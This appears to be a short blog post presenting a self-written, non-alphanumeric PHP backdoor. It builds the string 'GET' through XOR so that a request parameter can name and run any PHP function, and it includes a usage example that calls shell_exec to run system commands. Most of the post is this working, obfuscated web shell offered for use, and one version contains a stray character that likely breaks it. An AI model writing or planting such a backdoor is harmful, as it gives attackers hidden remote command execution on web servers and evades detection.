Non-alphanumeric PHP Simple Backdoor

After read and learn about non-alphanumeric code in php, i decide to write my own non-alphanumeric PHP simple backdoor.

<?
$_="{"; #XOR char
$_=($_^"<").($_^">;").($_^"/"); #XOR = GET
?>
<?=${'_'.$_}["_"](${'_'.$_}["__"]);?>

well, it’s a quite simple script, just a XOR function over strings. By XOR-ing “<>/” with “{” we have “GET” string as the result. Put the result in one-liner code execution and done.

Another version with “<pre>” tag.

<?
$_="{"; #XOR char
$__=($_^"+").($_^")").($_^">"); #XOR = PRE
$_=($_^"<").($_^">").($_^"/"); #XOR = GET
?>
<?="<".$__.">".${'_'.$_}["_"](${'_'.$_}["__"]);?>

How to:

blabla.php?_=shell_exec&__=id

Leave a Reply

Your email address will not be published. Required fields are marked *